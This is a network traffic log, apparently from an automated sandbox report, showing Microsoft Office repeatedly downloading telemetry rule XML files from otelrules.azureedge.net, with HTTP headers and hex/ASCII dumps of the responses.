                                                                                                                                                                                                            2024-11-22 03:27:37 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            105192.168.2.44993513.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:37 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:37 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:37 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1358
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                            x-ms-request-id: fa1269cf-b01e-003d-7592-3bd32c000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032737Z-15b8b599d88wn9hhhC1TEBry0g00000000tg00000000mp57
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:37 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            106192.168.2.44993613.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:37 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:38 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1389
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                            x-ms-request-id: f421f7ab-401e-0029-142f-3c9b43000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032738Z-178bfbc474bgvl54hC1NYCsfuw00000002eg000000004gqp
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:38 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            107192.168.2.44993813.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:39 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:39 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1352
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                            x-ms-request-id: 64a4ee2c-301e-0099-6775-3b6683000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032739Z-178bfbc474brk967hC1NYCfu60000000029g000000001edd
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:39 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            108192.168.2.44993913.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:39 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:39 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1405
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                            x-ms-request-id: b43d4aba-301e-0020-1845-3c6299000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032739Z-15b8b599d882zv28hC1TEBdchn00000000sg000000008rqu
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:39 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            109192.168.2.44994013.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:39 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:39 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1368
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                            x-ms-request-id: 110996dd-801e-0048-7360-3bf3fb000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032739Z-178bfbc474b9fdhphC1NYCac0n00000002c00000000064ru
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:39 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            110192.168.2.44994113.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:39 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:40 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:39 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                            x-ms-request-id: 07391f24-a01e-0032-508c-3a1949000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032739Z-178bfbc474btvfdfhC1NYCa2en00000002eg00000000cw5p
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:40 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            111192.168.2.44994213.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:40 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:40 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:40 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                            x-ms-request-id: 621687ee-a01e-0084-4027-3c9ccd000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032740Z-178bfbc474bpscmfhC1NYCfc2c000000011g0000000056hf
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:40 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            112192.168.2.44994313.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:41 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:41 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                            x-ms-request-id: e7fe902a-801e-0067-6164-3bfe30000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032741Z-178bfbc474bw8bwphC1NYC38b4000000027g00000000arfk
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:41 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            113192.168.2.44994413.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:41 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:42 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:41 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                            x-ms-request-id: b47886c8-201e-00aa-0c8c-3a3928000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032741Z-178bfbc474bbcwv4hC1NYCypys000000026000000000ha6r
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:42 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
